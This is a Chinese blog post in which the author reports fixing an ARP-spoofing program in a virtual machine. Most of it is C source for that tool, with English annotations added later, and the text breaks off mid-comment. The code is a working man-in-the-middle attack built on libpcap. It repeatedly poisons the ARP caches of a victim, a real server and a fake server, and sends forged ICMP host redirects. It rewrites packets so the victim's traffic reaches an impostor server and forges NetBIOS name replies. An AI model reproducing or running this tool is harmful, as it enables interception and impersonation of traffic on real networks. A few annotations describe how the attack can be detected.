
且行且记录

点滴记录,行的更远!

 
 
 


 
 

今天解决了虚拟机里用ArpCheat欺骗程序的失败的问题  

2014-04-25 15:25:49|  分类: 原理分析 |  标签: |举报 |字号 订阅


之前的ArpCheat程序在主机上能成功,但是virtual pc的vxp里不成功的问题,今天解决了。

用的是收到数据包后,先发构造的icmp主机重定向包给来源,并且本机绑定假mac到相关ip上,即可解决。

但是还是很慢,估计真的要用有限状态机跟踪seq号,才能解决这个效率问题。

还有掉线比以前少了,可能是我里面用的简化版检查和计算的问题。

主要代码如下(ArpCheat.cpp):

// ArpCheat.cpp

#include <stdio.h>
#include <pcap.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "wpcap.lib")

#include "proto2.h"
#include "chksum.h"

// IP/MAC table for the four hosts involved.
// Naming convention used throughout the file: an upper-case letter is a host's
// IPv4 address (DWORD as returned by inet_addr(), i.e. network byte order), the
// matching lower-case letter is that host's MAC.
typedef struct _IPMAC
{
 DWORD A; // victim's IP
 unsigned char a[6]; // victim's MAC

 DWORD B; // real server's IP
 unsigned char b[6]; // real server's MAC

 DWORD F; // fake server's IP
 unsigned char f[6]; // fake server's MAC

 DWORD H; // attacker's IP ("hacker H" in main's usage text)
 unsigned char h[6]; // attacker's MAC

} IPMAC, *PIPMAC;

// One ARP-poisoning job: the entry to be planted in a target's ARP cache.
typedef struct _DESTARP
{
 DWORD DestIp; // target's IP (whose ARP cache is being poisoned)
 unsigned char DestMac[6]; // target's MAC (destination of the ARP frames)

 DWORD ArpIp; // the IP whose mapping is spoofed in the target's cache
 unsigned char ArpMacFalse[6]; // MAC advertised for ArpIp while spoofing (CheatThread sends this)
 unsigned char ArpMacTrue[6];  // genuine MAC, re-advertised by ResetSpoof to repair the cache
} DESTARP, *PDESTARP;

IPMAC t; // the IP/MAC table, filled by GetAllIPMac() from argv
DESTARP tA,tB,tF; // poisoning jobs for A, B and F, set up in CheatArpCache()
HANDLE hThread[3]; // one CheatThread per job; terminated/restarted by ResetSpoof()

pcap_t *adhandle; // the opened capture/injection adapter (pcap_open_live in main)

unsigned short ff; // last two octets of F's IP (on a little-endian host), set in main
unsigned short bb; // last two octets of B's IP; ff/bb drive the incremental
                   // checksum fix-up in ForwardPacket

//int flag=1;
int count=0; // NetBIOS name-query broadcasts seen from A (ForwardPacket), reset after a reply
u_long if_addr; // IPv4 address of the selected interface, recorded by ifprint()

unsigned char broadcast[6]={0xff,0xff,0xff,0xff,0xff,0xff}; // broadcast MAC
unsigned char invalid_mac[6]={0x00,0x11,0x22,0x33,0x44,0x55}; // placeholder MAC (same value SetStatic hard-codes)

// Raw frame templates (Ethernet + IPv4 + payload), apparently taken from
// captured traffic and patched in place before being re-sent. Addresses,
// identifiers and checksums inside them are overwritten at run time; the
// bytes below are only the initial contents.

// NetBIOS name-service (UDP 137) query to the broadcast address.
// Not referenced anywhere else in this listing.
unsigned char NB_Query[]={
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x0C, 0x29, 0x95, 0x05, 0x28, 0x08, 0x00, 0x45, 0x00,
0x00, 0x4E, 0x00, 0x44, 0x00, 0x00, 0x80, 0x11, 0xBC, 0x08, 0xC0, 0xA8, 0x7E, 0x02, 0xC0, 0xA8,
0x7E, 0xFF, 0x00, 0x89, 0x00, 0x89, 0x00, 0x3A, 0xBC, 0x6C, 0x80, 0x37, 0x01, 0x10, 0x00, 0x01,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x46, 0x49, 0x46, 0x41, 0x46, 0x44, 0x46, 0x41, 0x44,
0x44, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43,
0x41, 0x43, 0x41, 0x43, 0x41, 0x41, 0x41, 0x00, 0x00, 0x20, 0x00, 0x01
};

// NetBIOS name-service (UDP 137) name response. ForwardPacket rewrites the
// MACs, IPs, transaction id, queried name and answer address, recomputes both
// checksums and sends it in reply to A's broadcast query.
unsigned char NB_Response[]={
0x00, 0x0C, 0x29, 0x95, 0x05, 0x28, 0x00, 0x50, 0x56, 0xC0, 0x00, 0x01, 0x08, 0x00, 0x45, 0x00,
0x00, 0x5A, 0x00, 0x31, 0x00, 0x00, 0x40, 0x11, 0xFD, 0x0D, 0xC0, 0xA8, 0x7E, 0x01, 0xC0, 0xA8,
0x7E, 0x02, 0x00, 0x89, 0x00, 0x89, 0x00, 0x46, 0x66, 0xCD, 0x80, 0x37, 0x85, 0x00, 0x00, 0x00,
0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x20, 0x46, 0x49, 0x46, 0x41, 0x46, 0x44, 0x46, 0x41, 0x44,
0x44, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43,
0x41, 0x43, 0x41, 0x43, 0x41, 0x41, 0x41, 0x00, 0x00, 0x20, 0x00, 0x01, 0x00, 0x04, 0x93, 0xE0,
0x00, 0x06, 0x00, 0x00, 0xC0, 0xA8, 0x7E, 0x01
};

// ICMP type 5 / code 1 ("redirect for host") quoting a UDP/IP header.
// Shared, mutable template used by both send_icmp_Hh_Aa_B and
// send_icmp_Hh_Ff_A, which patch it in place before sending.
unsigned char icmp_redir_udp[]={
0x00, 0x0B, 0xCD, 0x4E, 0x14, 0x47, 0x00, 0x03, 0xFF, 0x22, 0x04, 0x14, 0x08, 0x00, 0x45, 0x00, 
0x00, 0x38, 0x03, 0xC2, 0x00, 0x00, 0x80, 0x01, 0xA0, 0x90, 0xC0, 0xA8, 0x0A, 0xFA, 0xC0, 0xA8, 
0x0A, 0x28, 0x05, 0x01, 0xAD, 0x78, 0xC0, 0xA8, 0x0A, 0xF7, 0x45, 0x00, 0x00, 0x5A, 0x64, 0x5A, 
0x00, 0x00, 0x80, 0x11, 0x3F, 0xC9, 0xC0, 0xA8, 0x0A, 0x28, 0xC0, 0xA8, 0x0A, 0xF7, 0x00, 0x89, 
0x00, 0x89, 0x00, 0x46, 0x80, 0x8E
};

// Same redirect shape quoting a TCP/IP header.
// Not referenced anywhere else in this listing.
unsigned char icmp_redir_tcp[]={
0xD0, 0x67, 0xE5, 0x20, 0x04, 0x14, 0x00, 0x03, 0xFF, 0x22, 0x04, 0x14, 0x08, 0x00, 0x45, 0x00,
0x00, 0x38, 0x03, 0xC3, 0x00, 0x00, 0x80, 0x01, 0x9F, 0xC0, 0xC0, 0xA8, 0x0A, 0xFA, 0xC0, 0xA8,
0x0A, 0xF7, 0x05, 0x01, 0x67, 0xC2, 0xC0, 0xA8, 0x0A, 0x28, 0x45, 0x00, 0x00, 0x34, 0x14, 0x45,
0x40, 0x00, 0x40, 0x06, 0x90, 0x0F, 0xC0, 0xA8, 0x0A, 0xF7, 0xC0, 0xA8, 0x0A, 0x28, 0x0B, 0x23,
0x0D, 0x3D, 0xFD, 0xBA, 0xB2, 0x50
};

/*
void dumpbin(unsigned char *s,int n) //输出二进制内容
{
 int i;

 printf("===Begin Dump===");

 for (i=0;i<n;i++ )
 {
  if (i%16 == 0 )
  {
   printf("\n%04x: ",i);
  }
  printf("%02X ",*(s+i));
 }

 printf("\n");
 printf("===End Dump===\n");

}
*/

// IP identification counter for the crafted ICMP redirects (incremented by
// the send_icmp_* functions); starts at the value stored in the template.
unsigned short id = 0x03c2;

//
// Send an ICMP "redirect for host" frame from H (h) to A (a) naming B as the
// gateway. Called from ForwardPacket for A->B traffic; per the post this is
// what made the scheme work against a Virtual PC guest.
//
// pkt_data: the captured frame. Its IP header plus the following 8 bytes are
//           quoted in the ICMP body; frames that are not IPv4 are ignored
//           (note the template's MACs are already patched by then).
//
// Works on the shared global template icmp_redir_udp in place (not reentrant).
// The locals th, th1, uh and uh1 are unused. Header types, ETHERTYPE_IP and
// checksum() come from proto2.h / chksum.h, which are not in this listing.
//
// Detection note: an ICMP redirect whose source is not the host's configured
// gateway is the observable artifact of this step; hosts that ignore
// redirects are unaffected.
//
void send_icmp_Hh_Aa_B(const u_char *pkt_data)
{
 ETHeader *eh,*eh1;
    IPHeader *ih,*ih1;
    TCPHeader *th,*th1;
    UDPHeader *uh,*uh1;
    ICMPHeader *icmph1;
    u_int ip_len;

 eh = (ETHeader *) pkt_data;
 eh1 = (ETHeader *)icmp_redir_udp;
 memcpy(eh1->shost, t.h, 6); // from h
 memcpy(eh1->dhost, t.a, 6); // to a

 if(eh->type != htons(ETHERTYPE_IP)) return; // only IPv4 frames

 ih = (IPHeader *) (pkt_data + 14);
 ip_len = (ih->iphVerLen & 0x0f) * 4; // IHL of the captured packet, in bytes

 // Outer IP header of the redirect: H -> A, fresh id, checksum recomputed.
 ih1 = (IPHeader *) (icmp_redir_udp + 14);
 ih1->ipID = id++;
 ih1->ipSource = t.H; // H
 ih1->ipDestination = t.A; // A
 ih1->ipChecksum = 0;
 ih1->ipChecksum = checksum((USHORT *)ih1, sizeof(IPHeader));

 // ICMP part: gateway field = B, body = quoted IP header + 8 bytes of the
 // captured packet. Note the offset uses the captured packet's IHL, not the
 // template's.
 icmph1 = (ICMPHeader *) ((u_char*)ih1 + ip_len);
 icmph1->gateway = t.B; // B
 memcpy(&icmph1->ipheader, ih, sizeof(IPHeader)+8);
 icmph1->checksum = 0;
 icmph1->checksum = checksum((USHORT *)icmph1, sizeof(ICMPHeader));

 if (pcap_sendpacket(adhandle, (const unsigned char *) icmp_redir_udp, sizeof(icmp_redir_udp)) < 0)
 {
  printf("[-] send packet error\n");
 }
}

//
// Send an ICMP "redirect for host" frame from H (h) to F (f) naming A as the
// gateway. Mirror image of send_icmp_Hh_Aa_B, called from ForwardPacket for
// F->A traffic.
//
// pkt_data: the captured frame. Its IP header plus the following 8 bytes are
//           quoted in the ICMP body; frames that are not IPv4 are ignored
//           (note the template's MACs are already patched by then).
//
// Works on the shared global template icmp_redir_udp in place (not reentrant).
// The locals th, th1, uh and uh1 are unused. Header types, ETHERTYPE_IP and
// checksum() come from proto2.h / chksum.h, which are not in this listing.
//
void send_icmp_Hh_Ff_A(const u_char *pkt_data)
{
 ETHeader *eh,*eh1;
    IPHeader *ih,*ih1;
    TCPHeader *th,*th1;
    UDPHeader *uh,*uh1;
    ICMPHeader *icmph1;
    u_int ip_len;

 eh = (ETHeader *) pkt_data;
 eh1 = (ETHeader *)icmp_redir_udp;
 memcpy(eh1->shost, t.h, 6); // from h
 memcpy(eh1->dhost, t.f, 6); // to f

 if(eh->type != htons(ETHERTYPE_IP)) return; // only IPv4 frames

 ih = (IPHeader *) (pkt_data + 14);
 ip_len = (ih->iphVerLen & 0x0f) * 4; // IHL of the captured packet, in bytes

 // Outer IP header of the redirect: H -> F, fresh id, checksum recomputed.
 ih1 = (IPHeader *) (icmp_redir_udp + 14);
 ih1->ipID = id++;
 ih1->ipSource = t.H; // H
 ih1->ipDestination = t.F; // F
 ih1->ipChecksum = 0;
 ih1->ipChecksum = checksum((USHORT *)ih1, sizeof(IPHeader));

 // ICMP part: gateway field = A, body = quoted IP header + 8 bytes of the
 // captured packet. Note the offset uses the captured packet's IHL, not the
 // template's.
 icmph1 = (ICMPHeader *) ((u_char*)ih1 + ip_len);
 icmph1->gateway = t.A; // A
 memcpy(&icmph1->ipheader, ih, sizeof(IPHeader)+8);
 icmph1->checksum = 0;
 icmph1->checksum = checksum((USHORT *)icmph1, sizeof(ICMPHeader));

 if (pcap_sendpacket(adhandle, (const unsigned char *) icmp_redir_udp, sizeof(icmp_redir_udp)) < 0)
 {
  printf("[-] send packet error\n");
 }
}

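//
// Parse a textual MAC address into 6 raw bytes.
//
// macstr: exactly 17 characters: six two-digit hex groups separated by one
//         character each (e.g. "00-11-22-33-44-55"; the separator itself is
//         not checked, so ':' works too).
// buff:   receives the 6 bytes; left untouched when parsing fails.
// Returns TRUE on success, FALSE (after printing a diagnostic) for a NULL or
// wrong-length string or a group that is not two hex digits.
//
BOOL MacStr2Bin(char *macstr,unsigned char *buff)
{
 unsigned char mac[6];

 if (macstr == NULL || strlen(macstr)!=17)
 {
  printf("[-] Error %s len!=17\n", macstr ? macstr : "(null)");
  return FALSE;
 }

 for (int i=0;i<6 ;i++ )
 {
  // "%x" stores an unsigned int, so it needs an unsigned int target: the
  // previous code pointed it at a char slot, which is a 4-byte write into a
  // 1-byte location. The width 2 bounds the group; the range check rejects a
  // leading sign that %x would otherwise accept.
  unsigned int v;
  if (sscanf(macstr+3*i,"%2x",&v) != 1 || v > 0xff)
  {
   printf("[-] Error %s bad hex group %d\n", macstr, i);
   return FALSE;
  }
  mac[i] = (unsigned char)v;
 }

 memcpy(buff, mac, 6 );
 return TRUE;
}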


// 0 1 2 3 4 5 6 7 8 9
//   A a B b F f H h
// 得到IP MAC对应表
void GetAllIPMac(char *v[])
{
 t.A = inet_addr( v[1] );
 MacStr2Bin(v[2], t.a);

 t.B = inet_addr( v[3] );
 MacStr2Bin(v[4], t.b);

 t.F = inet_addr( v[5] );
 MacStr2Bin(v[6], t.f);

 t.H = inet_addr( v[7] );
 MacStr2Bin(v[8], t.h);

}

// argv layout: 0 1 2 3 4 5 6 7 8 9
//                A a B b F f H h
//
// Add static ARP entries on this host for A, B, F and H, all bound to the
// placeholder MAC 00-11-22-33-44-55 (the same value as invalid_mac) on the
// interface whose address ifprint() stored in if_addr. Per the post, binding
// a fake MAC locally is part of what made the redirect approach work in the VM.
//
// Runs "arp -s" through system(). The argv strings are interpolated into the
// command unescaped and cmd is a fixed 256-byte buffer written with sprintf;
// snprintf with a length check would bound it.
void SetStatic(char *v[])
{
 char cmd[256];

 for (int i=1; i<9; i+=2)
 {
  // arp -s 1.1.1.1 11-22-33-44-55-66 1.1.1.1
  // if_addr is in network byte order, so p[0]..p[3] are the dotted-quad octets.
  unsigned char *p;
  p = (unsigned char *) &if_addr;
  sprintf(cmd,"arp -s %s 00-11-22-33-44-55 %d.%d.%d.%d\n", v[i], p[0],p[1],p[2],p[3]);
  //sprintf(cmd,"arp -s %s %s %d.%d.%d.%d\n", v[i], v[i+1], p[0],p[1],p[2],p[3]);
  //printf("%s\n",cmd);
  system(cmd);
 }
}

//
// ARP-poisoning worker: one per DESTARP job (see CheatArpCache / ResetSpoof).
// Builds a single Ethernet+ARP *request* frame addressed to p->DestMac whose
// sender fields claim that p->ArpIp is at p->ArpMacFalse, then re-sends it
// every 3 s so the target keeps that mapping in its ARP cache.
//
// lparam: a PDESTARP; the struct must stay valid for the thread's lifetime
//         (callers pass the globals tA/tB/tF).
// Returns FALSE if pcap_sendpacket fails; otherwise it never returns on its
// own and is stopped with TerminateThread by ResetSpoof.
//
// NOTE(review): the opening '{' of the function body is missing in the
// listing as posted.
//
// Detection note: periodic unsolicited ARP requests whose sender MAC disagrees
// with the binding previously seen for that IP are the observable artifact
// (what ARP-watch style monitors alert on).
//
UINT CheatThread(LPVOID lparam)

 PDESTARP p = (PDESTARP)lparam;
 u_char ucFrame[ARP_LEN];

 // Ethernet header: h -> target, type ARP
 ETHeader eh = { 0 };
 memcpy(eh.dhost, p->DestMac, 6);
 memcpy(eh.shost, t.h, 6);
 eh.type = htons(ETHERTYPE_ARP);
 memcpy(ucFrame, &eh, sizeof(eh));

 // ARP header: Ethernet / IPv4 request
 ARPHeader ah = { 0 };
 ah.hrd = htons(ARPHRD_ETHER);
 ah.eth_type = htons(ETHERTYPE_IP);
 ah.maclen = 6;
 ah.iplen = 4;
 ah.opcode = htons(ARP_REQUEST);

 memcpy(ah.smac, p->ArpMacFalse, 6); // sender MAC: the spoofed (false) MAC
 ah.saddr = p->ArpIp; // sender IP: the IP whose mapping is being spoofed
 memset(ah.dmac, 0x00, 6);
 ah.daddr = p->DestIp;

 memcpy(&ucFrame[sizeof(ETHeader)], &ah, sizeof(ah));

 while(1)
 {
  if(pcap_sendpacket(adhandle, (const unsigned char *) ucFrame,
   ARP_LEN) < 0)
  {
   printf("[-] Send Packet Error\n");
   return FALSE;
  }

  Sleep(3000); // Sleep 3 sec to restore arp cache
 }
 return TRUE; 
}

// Start the three poisoning jobs, all advertising H's MAC as the false MAC:
//   tA: tell A that B is at h  (A's traffic for B then arrives here; see the
//       dhost == t.h checks in ForwardPacket)
//   tB: tell B that A is at h
//   tF: tell F that A is at h
// The ArpMacTrue fields are kept so ResetSpoof can re-advertise the genuine
// bindings later.
//
// CreateThread is called with NULL for stack size, creation flags and
// thread-id (all zero/default). CheatThread is declared UINT (LPVOID) and cast
// to LPTHREAD_START_ROUTINE (DWORD WINAPI (LPVOID)); on a 32-bit build the
// calling convention may differ unless the project defaults to __stdcall -
// presumably fine here, verify against the build settings.
void CheatArpCache()
{
 tA.DestIp = t.A;
 memcpy(tA.DestMac, t.a, 6);
 tA.ArpIp = t.B;
 memcpy(tA.ArpMacFalse, t.h, 6);
 memcpy(tA.ArpMacTrue, t.b, 6);
 hThread[0] = CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)CheatThread, (LPVOID) &tA, NULL, NULL);

 tB.DestIp = t.B;
 memcpy(tB.DestMac, t.b, 6);
 tB.ArpIp = t.A;
 memcpy(tB.ArpMacFalse, t.h, 6);
 memcpy(tB.ArpMacTrue, t.a, 6);
 hThread[1] = CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)CheatThread, (LPVOID) &tB, NULL, NULL);

 tF.DestIp = t.F;
 memcpy(tF.DestMac, t.f, 6);
 tF.ArpIp = t.A;
 memcpy(tF.ArpMacFalse, t.h, 6);
 memcpy(tF.ArpMacTrue, t.a, 6);
 hThread[2] = CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)CheatThread, (LPVOID) &tF, NULL, NULL);

}

//
// Rewrite-and-forward routine for every captured frame (the core of the
// program). Only IPv4 is handled. TCP and UDP get the same two rewrites
// (A->B relabelled as A->F, F->A relabelled as B->A); UDP additionally
// forwards B's NetBIOS name-service (port 137) replies to A and answers A's
// name-query broadcasts itself.
//
// adhandle: adapter used for pcap_sendpacket (shadows the global of the same
//           name; packet_handler passes the global in).
// pkt_data: the captured frame. It is modified IN PLACE through casts that
//           drop the const qualifier, then re-sent.
// pkt_len:  length handed to pcap_sendpacket (packet_handler passes
//           header->len, the on-wire length).
//
// The *Header structs, ETHERTYPE_IP, PROTO_TCP/PROTO_UDP, checksum() and
// CalcUdpCheckSum() come from proto2.h / chksum.h, which are not in this
// listing. The locals szSource, szDest, sport and dport are unused.
//
// Checksums: since only one IP address changes per rewrite, the IP and L4
// checksums are adjusted by the 16-bit difference between F's and B's last
// two octets (ff/bb, computed in main). The post describes this as a
// simplified calculation.
//
void ForwardPacket(pcap_t *adhandle, const u_char *pkt_data, unsigned int pkt_len)
{
 ETHeader *eh;
    IPHeader *ih;
    TCPHeader *th;
    UDPHeader *uh;
    u_int ip_len;
 char szSource[16],szDest[16];
    u_short sport, dport;

 eh = (ETHeader *) pkt_data;

 if(eh->type != htons(ETHERTYPE_IP)) return; // only IPv4 frames are forwarded

 ih = (IPHeader *) (pkt_data + 14); // IP header follows the 14-byte Ethernet header
 ip_len = (ih->iphVerLen & 0x0f) * 4; // IHL in bytes

 if (ih->ipProtocol == PROTO_TCP) // TCP
 {
  th = (TCPHeader *) ((u_char*)ih + ip_len); // TCP header follows the IP header

  // Direction A->B: sent by A (a) for B, but addressed to h at layer 2
  // because A's ARP cache is poisoned. Relabelled h->f with destination F.
  if (ih->ipDestination==t.B && memcmp(eh->dhost, t.h, 6) == 0
   && ih->ipSource==t.A && memcmp(eh->shost, t.a, 6) == 0)
  {
   send_icmp_Hh_Aa_B(pkt_data); // ICMP host redirect H->A, gateway B

   printf("[TCP] A->B/a->h => A->F/h->f\n");
   memcpy(eh->shost, t.h, 6);
   memcpy(eh->dhost, t.f, 6);

   ih->ipDestination = t.F;

   // Incremental checksum fix-up for the changed destination address
   unsigned long ipchk,tcpchk;

   ipchk= htons(ih->ipChecksum);
   tcpchk= htons(th->checksum);

   if (bb < ff)
   { // address went up, checksum goes down
    ipchk -= (ff-bb);
    tcpchk -= (ff-bb);
   }
   else
   { // address went down, checksum goes up
    ipchk += (bb-ff);
    tcpchk += (bb-ff);
   }

   ih->ipChecksum = ntohs(ipchk);
   th->checksum = ntohs(tcpchk);

   if (pcap_sendpacket(adhandle, (const unsigned char *) pkt_data, pkt_len) < 0)
   {
    printf("[-] Forward thread send packet error\n");
   }   
  }

  // Direction F->A: reply from the fake server F (f), relabelled h->a with
  // source B so A believes it came from the real server.
  if (ih->ipDestination==t.A && memcmp(eh->dhost, t.h, 6) == 0
   && ih->ipSource==t.F && memcmp(eh->shost, t.f, 6) == 0)
  {
   send_icmp_Hh_Ff_A(pkt_data); // ICMP host redirect H->F, gateway A

   printf("[TCP] F->A/f->h => B->A/h->a\n");
   memcpy(eh->shost, t.h, 6);
   memcpy(eh->dhost, t.a, 6);

   ih->ipSource = t.B;

   // Incremental checksum fix-up for the changed source address
   unsigned long ipchk,tcpchk;

   ipchk= htons(ih->ipChecksum);
   tcpchk= htons(th->checksum);

   if (ff > bb)
   { // address went down, checksum goes up
    ipchk += (ff-bb);
    tcpchk += (ff-bb);
   }
   else
   { // address went up, checksum goes down
    ipchk -= (bb-ff);
    tcpchk -= (bb-ff);
   }

   ih->ipChecksum = ntohs(ipchk);
   th->checksum = ntohs(tcpchk);

   if (pcap_sendpacket(adhandle, (const unsigned char *) pkt_data, pkt_len) < 0)
   {
    printf("[-] Forward thread send packet error\n");
   }
  }
 }
 else if (ih->ipProtocol == PROTO_UDP) // UDP
 {
  uh = (UDPHeader *) ((u_char*)ih + ip_len); // UDP header follows the IP header
  
  //
  // Direction A->B: same rewrite as the TCP case, UDP checksum adjusted
  if (ih->ipDestination==t.B && memcmp(eh->dhost, t.h, 6) == 0
   && ih->ipSource==t.A && memcmp(eh->shost, t.a, 6) == 0)
  {
   send_icmp_Hh_Aa_B(pkt_data); // ICMP host redirect H->A, gateway B

   printf("[UDP] A->B/a->h => A->F/h->f\n");
   memcpy(eh->shost, t.h, 6);
   memcpy(eh->dhost, t.f, 6);

   ih->ipDestination = t.F;

   // Incremental checksum fix-up for the changed destination address
   unsigned long ipchk,udpchk;

   ipchk= htons(ih->ipChecksum);
   udpchk= htons(uh->checksum);

   if (bb < ff)
   { // address went up, checksum goes down
    ipchk -= (ff-bb);
    udpchk -= (ff-bb);
   }
   else
   { // address went down, checksum goes up
    ipchk += (bb-ff);
    udpchk += (bb-ff);
   }

   ih->ipChecksum = ntohs(ipchk);
   uh->checksum = ntohs(udpchk);

   if (pcap_sendpacket(adhandle, (const unsigned char *) pkt_data, pkt_len) < 0)
   {
    printf("[-] Forward thread send packet error\n");
   }   
  }

  // Direction F->A: same rewrite as the TCP case, UDP checksum adjusted
  if (ih->ipDestination==t.A && memcmp(eh->dhost, t.h, 6) == 0
   && ih->ipSource==t.F && memcmp(eh->shost, t.f, 6) == 0)
  {
   send_icmp_Hh_Ff_A(pkt_data); // ICMP host redirect H->F, gateway A

   printf("[UDP] F->A/f->h => B->A/h->a\n");
   memcpy(eh->shost, t.h, 6);
   memcpy(eh->dhost, t.a, 6);

   ih->ipSource = t.B;

   // Incremental checksum fix-up for the changed source address
   unsigned long ipchk,udpchk;

   ipchk= htons(ih->ipChecksum);
   udpchk= htons(uh->checksum);

   if (ff > bb)
   { // address went down, checksum goes up
    ipchk += (ff-bb);
    udpchk += (ff-bb);
   }
   else
   { // address went up, checksum goes down
    ipchk -= (bb-ff);
    udpchk -= (bb-ff);
   }

   ih->ipChecksum = ntohs(ipchk);
   uh->checksum = ntohs(udpchk);

   if (pcap_sendpacket(adhandle, (const unsigned char *) pkt_data, pkt_len) < 0)
   {
    printf("[-] Forward thread send packet error\n");
   }
  }

  //
  // Direction B->A (UDP only): traffic for A that arrived at h
  if (ih->ipDestination==t.A && memcmp(eh->dhost, t.h, 6) == 0)
  {
   // B->A/b->h => B->A/h->a
   // 0x8900 is port 137 (0x0089) as read on a little-endian host.
   if (memcmp(eh->shost, t.b, 6) == 0 && uh->sourcePort == 0x8900 && uh->destinationPort == 0x8900)
   {
    // Forward B's name-service (137) reply to A. Only the MACs change, so
    // the IP/UDP checksums stay valid.
    printf("[UDP] b->h => h->a\n");
    memcpy(eh->shost, t.h, 6);
    memcpy(eh->dhost, t.a, 6);

    if (pcap_sendpacket(adhandle, (const unsigned char *) pkt_data, pkt_len) < 0)
    {
     printf("[-] Forward thread send packet error\n");
    }
   }

  }

  // NetBIOS name-query broadcast from A. Per the author, A repeats it three
  // times when the queried host is down; the reply below is only sent from
  // the second query on (count is global and reset after replying).
  if (memcmp(eh->shost, t.a, 6) == 0 && memcmp(eh->dhost, broadcast, 6) == 0)
  {
   NBHeader *nh;
   nh = (NBHeader *) ((u_char *)uh + sizeof(UDPHeader));

   if ( uh->sourcePort == 0x8900 && uh->destinationPort == 0x8900 && nh->Flags==0x1001) // 137 = 0x0089 in network order; Flags compared in the same byte-swapped form
   {
    count++;
    if (count > 1)
    {
     ETHeader *eh1;
     IPHeader *ih1;
     UDPHeader *uh1;
     NBHeader *nh1;
     //NBHeader Response;

     // Patch the NB_Response template in place. Note the UDP header offset
     // uses the *captured* packet's IHL (ip_len), not the template's.
     eh1 = (ETHeader *) NB_Response;
     ih1 = (IPHeader *) (NB_Response+14);
     uh1 = (UDPHeader *) ((u_char*)ih1 + ip_len);;
     nh1 = (NBHeader *) ((u_char *)uh1 + sizeof(UDPHeader));

     // Ethernet header: h -> a
     printf("[UDP] a->* => h->a\n");
     memcpy(eh1->shost, t.h, 6);
     memcpy(eh1->dhost, t.a, 6);

     // IP header: appears to come from B
     printf("[UDP] A->* => B->A\n\n");
     ih1->ipSource = t.B;
     ih1->ipDestination = t.A;

     nh1->TransID = nh->TransID; // echo the query's transaction id
     memcpy(nh1->Name, nh->Name, 0x22); // the name A asked for (0x22 bytes)
     nh1->AddressIP = t.B;  // answer with the real server B; per the author, answering with F would require stopping the spoofing first

     // UDP payload pointer and length, derived from the template's IP total length
     unsigned char *dataudp = (unsigned char *) ih1 + sizeof(IPHeader)
      + sizeof(UDPHeader);
     int lenudp = ntohs(ih1->ipLength) - (sizeof(IPHeader) + sizeof(UDPHeader));

     // Full recomputation of both checksums (unlike the incremental fix-ups above)
     ih1->ipChecksum = 0;
     uh1->checksum = 0;
     ih1->ipChecksum = checksum((USHORT *)ih1, sizeof(IPHeader));
     CalcUdpCheckSum(ih1, uh1, (char *)dataudp, lenudp);

     count=0;

     if (pcap_sendpacket(adhandle, (const unsigned char *) NB_Response, sizeof(NB_Response)) < 0)
     {
      printf("[-] Forward thread send packet error\n");
     }

    }
   }
  }
 }
 else // other protocols (ICMP, ...) are ignored
 {
 }
}

//
// pcap_loop callback: hands every captured frame to ForwardPacket.
//
// param:    user pointer given to pcap_loop (NULL in main); unused.
// header:   pcap record header. Only len (the on-wire length) is used as the
//           forward length; caplen is the number of bytes actually captured,
//           and with main's 65536 snaplen the two agree in practice.
// pkt_data: the captured frame, forwarded through the global adapter handle.
//
void packet_handler(u_char *param, const struct pcap_pkthdr *header, const u_char *pkt_data)
{
 (void)param;
 const unsigned int wire_len = header->len;
 ForwardPacket(adhandle, pkt_data, wire_len);
}

//
// Undo the poisoning on Ctrl-C/close (called from CtrlHandler): stop the three
// workers, restart them for a few seconds with ArpMacTrue as the advertised
// MAC so the targets relearn the genuine bindings, stop them again, flush this
// host's own ARP cache and break out of pcap_loop.
//
// Notes: TerminateThread stops a thread without any cleanup (documented Win32
// behaviour); the workers only loop on pcap_sendpacket/Sleep, so the main
// risk is an interrupted pcap call. The "Sleep 5s" message does not match the
// loop below, which waits 12 x 300 ms = 3.6 s.
//
void ResetSpoof()
{
 printf("[*] Reseting .....\n");

 TerminateThread(hThread[0], 0); 
 TerminateThread(hThread[1], 0);
 TerminateThread(hThread[2], 0);

 // Swap the genuine MAC into the "false" slot and re-run the same workers,
 // so they now advertise the correct binding to each target.
 memcpy(tA.ArpMacFalse, tA.ArpMacTrue, 6);
 hThread[0] = CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)CheatThread, (LPVOID) &tA, NULL, NULL);

 memcpy(tB.ArpMacFalse, tB.ArpMacTrue, 6);
 hThread[1] = CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)CheatThread, (LPVOID) &tB, NULL, NULL);

 memcpy(tF.ArpMacFalse, tF.ArpMacTrue, 6);
 hThread[2] = CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)CheatThread, (LPVOID) &tF, NULL, NULL);

 printf("[*] Sleep 5s ");
 for(int i = 0; i < 12; i++, Sleep(300))
   printf(".");
 printf("\n");
 TerminateThread(hThread[0], 0); 
 TerminateThread(hThread[1], 0);
 TerminateThread(hThread[2], 0);
 
 // "arp -d" with no host argument clears this host's whole ARP cache,
 // including the static entries SetStatic added.
 system("arp -d\n");

 // Author's warning: after pcap_breakloop, any further use of the adapter
 // aborts the program.
 pcap_breakloop(adhandle);
}


//
// Console control handler (installed with SetConsoleCtrlHandler in main).
// On Ctrl-C, Ctrl-Break, console close, logoff or shutdown it repairs the
// targets' ARP caches via ResetSpoof and reports the event as handled;
// any other event is left to the default handler.
//
BOOL CtrlHandler( DWORD fdwCtrlType )
{
 const BOOL is_stop_event =
  fdwCtrlType == CTRL_C_EVENT ||
  fdwCtrlType == CTRL_CLOSE_EVENT ||
  fdwCtrlType == CTRL_BREAK_EVENT ||
  fdwCtrlType == CTRL_LOGOFF_EVENT ||
  fdwCtrlType == CTRL_SHUTDOWN_EVENT;

 if (!is_stop_event)
 {
  return FALSE;
 }

 ResetSpoof(); // restore the poisoned ARP caches before the process goes away
 return TRUE;
}

/* From tcptraceroute: render a numeric IPv4 address (network byte order, as
